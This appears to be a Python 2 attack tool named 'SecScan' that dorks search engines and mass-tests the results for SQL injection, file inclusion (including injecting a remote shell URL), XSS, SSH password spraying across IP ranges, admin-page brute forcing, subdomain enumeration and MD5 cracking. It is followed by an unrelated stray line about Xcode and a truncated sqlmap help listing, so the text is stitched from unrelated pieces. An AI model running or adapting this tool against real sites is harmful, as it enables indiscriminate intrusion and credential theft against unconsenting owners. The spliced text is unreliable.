#!/usr/bin/env python import re import hashlib import Queue from random import choice import threading import time import urllib2 import sys import socket try: import paramiko PARAMIKO_IMPORTED = True except ImportError: PARAMIKO_IMPORTED = False USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)", "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6", "Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3" ] option = ' ' vuln = 0 invuln = 0 np = 0 found = [] class Router(threading.Thread): """Checks for routers running ssh with given User/Pass""" def __init__(self, queue, user, passw): if not PARAMIKO_IMPORTED: print 'You need paramiko.' print 'http://www.lag.net/paramiko/' sys.exit(1) threading.Thread.__init__(self) self.queue = queue self.user = user self.passw = passw def run(self): """Tries to connect to given Ip on port 22""" ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) while True: try: ip_add = self.queue.get(False) except Queue.Empty: break try: ssh.connect(ip_add, username = self.user, password = self.passw, timeout = 10) ssh.close() print "Working: %s:22 - %s:%s\n" % (ip_add, self.user, self.passw) write = open('Routers.txt', "a+") write.write('%s:22 %s:%s\n' % (ip_add, self.user, self.passw)) write.close() self.queue.task_done() except: print 'Not Working: %s:22 - %s:%s\n' % (ip_add, self.user, self.passw) self.queue.task_done() class Ip: """Handles the Ip range creation""" def __init__(self): self.ip_range = [] self.start_ip = raw_input('Start ip: ') self.end_ip = raw_input('End ip: ') self.user = raw_input('User: ') self.passw = raw_input('Password: ') self.iprange() def iprange(self): """Creates list of Ip's from Start_Ip to End_Ip""" queue = Queue.Queue() start = list(map(int, self.start_ip.split("."))) end = list(map(int, self.end_ip.split("."))) tmp = start self.ip_range.append(self.start_ip) while tmp != end: start[3] += 1 for i in (3, 2, 1): if tmp[i] == 256: tmp[i] = 0 tmp[i-1] += 1 self.ip_range.append(".".join(map(str, tmp))) for add in self.ip_range: queue.put(add) for i in range(10): thread = Router(queue, self.user, self.passw ) thread.setDaemon(True) thread.start() queue.join() class Crawl: """Searches for dorks and grabs results""" def __init__(self): if option == '4': self.shell = str(raw_input('Shell location: ')) self.dork = raw_input('Enter your dork: ') self.queue = Queue.Queue() self.pages = raw_input('How many pages(Max 20): ') self.qdork = urllib2.quote(self.dork) self.page = 1 self.crawler() def crawler(self): """Crawls Ask.com for sites and sends them to appropriate scan""" print '\nDorking...' for i in range(int(self.pages)): host = "http://uk.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page) req = urllib2.Request(host) req.add_header('User-Agent', choice(USER_AGENT)) response = urllib2.urlopen(req) source = response.read() start = 0 count = 1 end = len(source) numlinks = source.count('_t" href', start, end) while count < numlinks: start = source.find('_t" href', start, end) end = source.find(' onmousedown="return pk', start, end) link = source[start+10:end-1].replace("amp;","") self.queue.put(link) start = end end = len(source) count = count + 1 self.page += 1 if option == '1': for i in range(10): thread = ScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '2': for i in range(10): thread = LScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '3': for i in range(10): thread = XScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '4': for i in range(10): thread = RScanClass(self.queue, self.shell) thread.setDaemon(True) thread.start() self.queue.join() class ScanClass(threading.Thread): """Scans for Sql errors and ouputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.schar = "'" self.file = 'sqli.txt' def run(self): """Scans Url for Sql errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np test = site + self.schar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("error in your SQL syntax", data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('oracle.jdbc.', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('system.data.oledb', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('SQL command net properly ended', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('atoracle.jdbc.', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('java.sql.sqlexception', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('query failed:', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('postgresql.util.', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('mysql_fetch', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('Error:unknown', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('JET Database Engine', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('Microsoft OLE DB Provider for', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('mysql_numrows', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('mysql_num', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('Invalid Query', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('FetchRow', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('JET Database', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('OLE DB Provider for', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('Syntax error', data, re.I)): self.mssql(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def mysql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + W+url else: print O+"MySql: " + url + W write = open(self.file, "a+") write.write('[SQLI]: ' + url + "\n") write.close() def mssql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file).read() if url in read: print G+'Dupe: ' + url + W else: print O+"MsSql: " + url + W write = open (self.file, "a+") write.write('[SQLI]: ' + url + "\n") write.close() class LScanClass(threading.Thread): """Scans for Lfi errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.file = 'lfi.txt' self.queue = queue self.lchar = '../' def run(self): """Checks Url for File Inclusion errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: lsite = site.rsplit('=', 1)[0] if lsite[-1] != "=": lsite = lsite + "=" test = lsite + self.lchar global vuln global invuln global np try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("failed to open stream: No such file or directory", data, re.I)): self.lfi(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def lfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Lfi: " + url + W write = open(self.file, "a+") write.write('[LFI]: ' + url + "\n") write.close() class XScanClass(threading.Thread): """Scan for Xss errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.xchar = """<ScRIpT>alert('xssBYm0le');</ScRiPt>""" self.file = 'xss.txt' def run(self): """Checks Url for possible Xss""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np xsite = site.rsplit('=', 1)[0] if xsite[-1] != "=": xsite = xsite + "=" test = xsite + self.xchar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("xssBYm0le", data, re.I)): self.xss(test) vuln += 1 else: print B+test + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def xss(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Xss: " + url + W write = open(self.file, "a+") write.write('[XSS]: ' + url + "\n") write.close() class RScanClass(threading.Thread): """Scans for Rfi errors and outputs to file""" def __init__(self, queue, shell): threading.Thread.__init__(self) self.queue = queue self.file = 'rfi.txt' self.shell = shell def run(self): """Checks Url for Remote File Inclusion vulnerability""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np rsite = site.rsplit('=', 1)[0] if rsite[-1] != "=": rsite = rsite + "=" link = rsite + self.shell + '?' try: conn = urllib2.Request(link) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall('uname -a', data, re.I)): self.rfi(link) vuln += 1 else: print B+link + W+' <-- Not Vuln' invuln += 1 else: print R+site + W+' <-- No Parameters' np += 1 self.queue.task_done() def rfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print G+'Dupe: ' + url + W else: print O+"Rfi: " + url + W write = open(self.file, "a+") write.write('[Rfi]: ' + url + "\n") write.close() class Atest(threading.Thread): """Checks given site for Admin Pages/Dirs""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Admin Page/Dir exists""" while True: try: site = self.queue.get(False) except Queue.Empty: break try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) print site found.append(site) self.queue.task_done() except urllib2.URLError: self.queue.task_done() def admin(): """Create queue and threads for admin page scans""" print 'Need to include http:// and ending /\n' site = raw_input('Site: ') queue = Queue.Queue() dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/', 'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/', 'memberadmin/', 'administratorlogin/', 'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php', 'joomla/administrator', 'login.php', 'admin_area/admin.php' ,'admin_area/login.php' ,'siteadmin/login.php' ,'siteadmin/index.php', 'siteadmin/login.html', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php', 'bb-admin/admin.php', 'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php', 'admincp/index.asp', 'admincp/login.asp', 'admincp/index.html', 'admin/account.html', 'adminpanel.html', 'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html', 'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php', 'administrator/index.php', 'cms', 'administrator/login.php', 'nsw/admin/login.php', 'webadmin/login.php', 'admin/admin_login.php', 'admin_login.php', 'administrator/account.php' ,'administrator.php', 'admin_area/admin.html', 'pages/admin/admin-login.php' ,'admin/admin-login.php', 'admin-login.php', 'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html', 'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php', 'pages/admin/admin-login.html', 'admin/admin-login.html', 'admin-login.html', 'controlpanel.php', 'admincontrol.php', 'admin/adminLogin.html' ,'adminLogin.html', 'admin/adminLogin.html', 'home.html', 'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php', 'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html', 'admin.html', 'admin/cp.html', 'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html', 'user.html', 'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html', 'moderator/login.html', 'adminarea/login.html', 'panel-administracion/index.html', 'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html', 'admincontrol/login.html', 'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php', 'account.html', 'controlpanel.html', 'admincontrol.html', 'panel-administracion/login.php', 'wp-login.php', 'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php','adminarea/index.php' ,'adminarea/admin.php' ,'adminarea/login.php', 'panel-administracion/index.php', 'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php', 'admincontrol/login.php', 'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php', 'admin2/index.php', 'adm/index.php', 'adm.php', 'affiliate.php','admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/'] for add in dirs: test = site + add queue.put(test) for i in range(20): thread = Atest(queue) thread.setDaemon(True) thread.start() queue.join() def aprint(): """Print results of admin page scans""" print 'Search Finished\n' if len(found) == 0: print 'No pages found' else: for site in found: print O+'Found: ' + G+site + W class SDtest(threading.Thread): """Checks given Domain for Sub Domains""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Sub Domain responds""" while True: try: domain = self.queue.get(False) except Queue.Empty: break try: site = 'http://' + domain conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) except urllib2.URLError: self.queue.task_done() else: target = socket.gethostbyname(domain) print 'Found: ' + site + ' - ' + target self.queue.task_done() def subd(): """Create queue and threads for sub domain scans""" queue = Queue.Queue() site = raw_input('Domain: ') sub = ["admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap", "archivos", "aula", "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta", "biblioteca", "billing", "blackboard", "blog", "blogs", "bsd", "cart", "catalog", "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom", "clientes", "clients", "carro", "connect", "controller", "correoweb", "cpanel", "csg", "customers", "db", "dbs", "demo", "demon", "demostration", "descargas", "developers", "development", "diana", "directory", "dmz", "domain", "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo", "ejemplos", "email", "enrutador", "example", "examples", "exchange", "eventos", "events", "extranet", "files", "finance", "firewall", "foro", "foros", "forum", "forums", "ftp", "ftpd", "fw", "galeria", "gallery", "gateway", "gilford", "groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera", "heracles", "hercules", "home", "homer", "hotspot", "hypernova", "images", "imap", "imap3", "imap3d", "imapd", "imaps", "imgs", "imogen", "inmuebles", "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio", "lab", "laboratories", "labs", "library", "linux", "lisa", "login", "logs", "mail", "mailgate", "manager", "marketing", "members", "mercury", "meta", "meta01", "meta02", "meta03", "miembros", "minerva", "mob", "mobile", "moodle", "movil", "mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon", "netmail", "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa", "partners", "pcanywhere", "pegasus", "pendrell", "personal", "photo", "photos", "pop", "pop3", "portal", "postman", "postmaster", "private", "proxy", "prueba", "pruebas", "public", "ras", "remote", "reports", "research", "restricted", "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search", "secure", "seguro", "server", "services", "servicios", "servidor", "shop", "shopping", "smtp", "socios", "soporte", "squirrel", "squirrelmail", "ssh", "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test", "tftp", "tienda", "unix", "upload", "uploads", "ventas", "virtual", "vista", "vnc", "vpn", "vpn1", "vpn2", "vpn3", "wap", "web1", "web2", "web3", "webct", "webadmin", "webmail", "webmaster", "win", "windows", "www", "ww0", "ww1", "ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus"] for check in sub: test = check + '.' + site queue.put(test) for i in range(20): thread = SDtest(queue) thread.setDaemon(True) thread.start() queue.join() class Cracker(threading.Thread): """Use a wordlist to try and brute the hash""" def __init__(self, queue, hashm): threading.Thread.__init__(self) self.queue = queue self.hashm = hashm def run(self): """Hash word and check against hash""" while True: try: word = self.queue.get(False) except Queue.Empty: break tmp = hashlib.md5(word).hexdigest() if tmp == self.hashm: self.result(word) self.queue.task_done() def result(self, words): """Print result if found""" print self.hashm + ' = ' + words def word(): """Create queue and threads for hash crack""" queue = Queue.Queue() wordlist = raw_input('Wordlist: ') hashm = raw_input('Enter Md5 hash: ') read = open(wordlist) for words in read: words = words.replace("\n","") queue.put(words) read.close() for i in range(5): thread = Cracker(queue, hashm) thread.setDaemon(True) thread.start() queue.join() class OnlineCrack: """Use online service to check for hash""" def crack(self): """Connect and check hash""" hashm = raw_input('Enter MD5 Hash: ') conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm)) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() if data == 'No results returned.': print '\n- Not found or not valid -' else: print '\n- %s -' % (data) class Check: """Check your current IP address""" def grab(self): """Connect to site and grab IP""" site = 'http://www.tracemyip.org/' try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() start = 0 end = len(data) start = data.find('onClick="', start, end) end = data.find('size=', start, end) ip_add = data[start+46:end-2].strip() print '\nYour current Ip address is %s' % (ip_add) except urllib2.HTTPError: print 'Error connecting' def output(): """Outputs dork scan results to screen""" print '\n>> ' + str(vuln) + G+' Vulnerable Sites Found' + W print '>> ' + str(invuln) + G+' Sites Not Vulnerable' + W print '>> ' + str(np) + R+' Sites Without Parameters' + W if option == '1': print '>> Output Saved To sqli.txt\n' elif option == '2': print '>> Output Saved To lfi.txt' elif option == '3': print '>> Output Saved To xss.txt' elif option == '4': print '>> Output Saved To rfi.txt' W = "\033[0m"; R = "\033[31m"; G = "\033[32m"; O = "\033[33m"; B = "\033[34m"; def main(): """Outputs Menu and gets input""" quotes = [ '\nm0le@tormail.org\n' ] print (O+''' ------------- -- SecScan -- --- v1.5 ---- ---- by ----- --- m0le ---- -------------''') print (G+''' -[1]- SQLi -[2]- LFI -[3]- XSS -[4]- RFI -[5]- Proxy -[6]- Admin Page Finder -[7]- Sub Domain Scan -[8]- Dictionary MD5 cracker -[9]- Online MD5 cracker -[10]- Check your IP address''') print (B+''' -[!]- If freeze while running or want to quit, just Ctrl C, it will automatically terminate the job. ''') print W global option option = raw_input('Enter Option: ') if option: if option == '1': Crawl() output() print choice(quotes) elif option == '2': Crawl() output() print choice(quotes) elif option == '3': Crawl() output() print choice(quotes) elif option == '4': Crawl() output() print choice(quotes) elif option == '5': Ip() print choice(quotes) elif option == '6': admin() aprint() print choice(quotes) elif option == '7': subd() print choice(quotes) elif option == '8': word() print choice(quotes) elif option == '9': OnlineCrack().crack() print choice(quotes) elif option == '10': Check().grab() print choice(quotes) else: print R+'\nInvalid Choice\n' + W time.sleep(0.9) main() else: print R+'\nYou Must Enter An Option (Check if your typo is corrected.)\n' + W time.sleep(0.9) main() if __name__ == '__main__': main()

a shell script to cleanup Xcode cache and tmp files

Usage: python sqlmap.py [options] Options: -h, --help Show basic help message and exit -hh Show advanced help message and exit --version Show program's version number and exit -v VERBOSE Verbosity level: 0-6 (default 1) Target: At least one of these options has to be provided to define the target(s) -d DIRECT Connection string for direct database connection -u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1") -l LOGFILE Parse target(s) from Burp or WebScarab proxy log file -x SITEMAPURL Parse target(s) from remote sitemap(.xml) file -m BULKFILE Scan multiple targets given in a textual file -r REQUESTFILE Load HTTP request from a file -g GOOGLEDORK Process Google dork results as target URLs -c CONFIGFILE Load options from a configuration INI file Request: These options can be used to specify how to connect to the target URL --method=METHOD Force usage of given HTTP method (e.g. PUT) --data=DATA Data string to be sent through POST --param-del=PARA.. Character used for splitting parameter values --cookie=COOKIE HTTP Cookie header value --cookie-del=COO.. Character used for splitting cookie values --load-cookies=L.. File containing cookies in Netscape/wget format --drop-set-cookie Ignore Set-Cookie header from response --user-agent=AGENT HTTP User-Agent header value --random-agent Use randomly selected HTTP User-Agent header value --host=HOST HTTP Host header value --referer=REFERER HTTP Referer header value -H HEADER, --hea.. Extra header (e.g. "X-Forwarded-For: 127.0.0.1") --headers=HEADERS Extra headers (e.g. "Accept-Language: fr\nETag: 123") --auth-type=AUTH.. HTTP authentication type (Basic, Digest, NTLM or PKI) --auth-cred=AUTH.. HTTP authentication credentials (name:password) --auth-file=AUTH.. HTTP authentication PEM cert/private key file --ignore-401 Ignore HTTP Error 401 (Unauthorized) --proxy=PROXY Use a proxy to connect to the target URL --proxy-cred=PRO.. Proxy authentication credentials (name:password) --proxy-file=PRO.. Load proxy list from a file --ignore-proxy Ignore system default proxy settings --tor Use Tor anonymity network --tor-port=TORPORT Set Tor proxy port other than default --tor-type=TORTYPE Set Tor proxy type (HTTP (default), SOCKS4 or SOCKS5) --check-tor Check to see if Tor is used properly --delay=DELAY Delay in seconds between each HTTP request --timeout=TIMEOUT Seconds to wait before timeout connection (default 30) --retries=RETRIES Retries when the connection timeouts (default 3) --randomize=RPARAM Randomly change value for given parameter(s) --safe-url=SAFEURL URL address to visit frequently during testing --safe-post=SAFE.. POST data to send to a safe URL --safe-req=SAFER.. Load safe HTTP request from a file --safe-freq=SAFE.. Test requests between two visits to a given safe URL --skip-urlencode Skip URL encoding of payload data --csrf-token=CSR.. Parameter used to hold anti-CSRF token --csrf-url=CSRFURL URL address to visit to extract anti-CSRF token --force-ssl Force usage of SSL/HTTPS --hpp Use HTTP parameter pollution method --eval=EVALCODE Evaluate provided Python code before the request (e.g. "import hashlib;id2=hashlib.md5(id).hexdigest()") Optimization: These options can be used to optimize the performance of sqlmap -o Turn on all optimization switches --predict-output Predict common queries output --keep-alive Use persistent HTTP(s) connections --null-connection Retrieve page length without actual HTTP response body --threads=THREADS Max number of concurrent HTTP(s) requests (default 1) Injection: These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts -p TESTPARAMETER Testable parameter(s) --skip=SKIP Skip testing for given parameter(s) --skip-static Skip testing parameters that not appear dynamic --dbms=DBMS Force back-end DBMS to this value --dbms-cred=DBMS.. DBMS authentication credentials (user:password) --os=OS Force back-end DBMS operating system to this value --invalid-bignum Use big numbers for invalidating values --invalid-logical Use logical operations for invalidating values --invalid-string Use random strings for invalidating values --no-cast Turn off payload casting mechanism --no-escape Turn off string escaping mechanism --prefix=PREFIX Injection payload prefix string --suffix=SUFFIX Injection payload suffix string --tamper=TAMPER Use given script(s) for tampering injection data Detection: These options can be used to customize the detection phase --level=LEVEL Level of tests to perform (1-5, default 1) --risk=RISK Risk of tests to perform (1-3, default 1) --string=STRING String to match when query is evaluated to True --not-string=NOT.. String to match when query is evaluated to False --regexp=REGEXP Regexp to match when query is evaluated to True --code=CODE HTTP code to match when query is evaluated to True --text-only Compare pages based only on the textual content --titles Compare pages based only on their titles Techniques: These options can be used to tweak testing of specific SQL injection techniques --technique=TECH SQL injection techniques to use (default "BEUSTQ") --time-sec=TIMESEC Seconds to delay the DBMS response (default 5) --union-cols=UCOLS Range of columns to test for UNION query SQL injection --union-char=UCHAR Character to use for bruteforcing number of columns --union-from=UFROM Table to use in FROM part of UNION query SQL injection --dns-domain=DNS.. Domain name used for DNS exfiltration attack --second-order=S.. Resulting page URL searched for second-order response Fingerprint: -f, --fingerprint Perform an extensive DBMS version fingerprint Enumeration: These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements -a, --all Retrieve everything -b, --banner Retrieve DBMS banner --current-user Retrieve DBMS current user --current-db Retrieve DBMS current database --hostname Retrieve DBMS server hostname --is-dba Detect if the DBMS current user is DBA --users Enumerate DBMS users --passwords Enumerate DBMS users password hashes --privileges Enumerate DBMS users privileges --roles Enumerate DBMS users roles --dbs Enumerate DBMS databases --tables Enumerate DBMS database tables --columns Enumerate DBMS database table columns --schema Enumerate DBMS schema --count Retrieve number of entries for table(s) --dump Dump DBMS database table entries --dump-all Dump all DBMS databases tables entries --search Search column(s), table(s) and/or database name(s) --comments Retrieve DBMS comments -D DB DBMS database to enumerate -T TBL DBMS database table(s) to enumerate -C COL DBMS database table column(s) to enumerate -X EXCLUDECOL DBMS database table column(s) to not enumerate -U USER DBMS user to enumerate --exclude-sysdbs Exclude DBMS system databases when enumerating tables --pivot-column=P.. Pivot column name --where=DUMPWHERE Use WHERE condition while table dumping --start=LIMITSTART First query output entry to retrieve --stop=LIMITSTOP Last query output entry to retrieve --first=FIRSTCHAR First query output word character to retrieve --last=LASTCHAR Last query output word character to retrieve --sql-query=QUERY SQL statement to be executed --sql-shell Prompt for an interactive SQL shell --sql-file=SQLFILE Execute SQL statements from given file(s) Brute force: These options can be used to run brute force checks --common-tables Check existence of common tables --common-columns Check existence of common columns User-defined function injection: These options can be used to create custom user-defined functions --udf-inject Inject custom user-defined functions --shared-lib=SHLIB Local path of the shared library File system access: These options can be used to access the back-end database management system underlying file system --file-read=RFILE Read a file from the back-end DBMS file system --file-write=WFILE Write a local file on the back-end DBMS file system --file-dest=DFILE Back-end DBMS absolute filepath to write to Operating system access: These options can be used to access the back-end database management system underlying operating system --os-cmd=OSCMD Execute an operating system command --os-shell Prompt for an interactive operating system shell --os-pwn Prompt for an OOB shell, Meterpreter or VNC --os-smbrelay One click prompt for an OOB shell, Meterpreter or VNC --os-bof Stored procedure buffer overflow exploitation --priv-esc Database process user privilege escalation --msf-path=MSFPATH Local path where Metasploit Framework is installed --tmp-path=TMPPATH Remote absolute path of temporary files directory Windows registry access: These options can be used to access the back-end database management system Windows registry --reg-read Read a Windows registry key value --reg-add Write a Windows registry key value data --reg-del Delete a Windows registry key value --reg-key=REGKEY Windows registry key --reg-value=REGVAL Windows registry key value --reg-data=REGDATA Windows registry key value data --reg-type=REGTYPE Windows registry key value type General: These options can be used to set some general working parameters -s SESSIONFILE Load session from a stored (.sqlite) file -t TRAFFICFILE Log all HTTP traffic into a textual 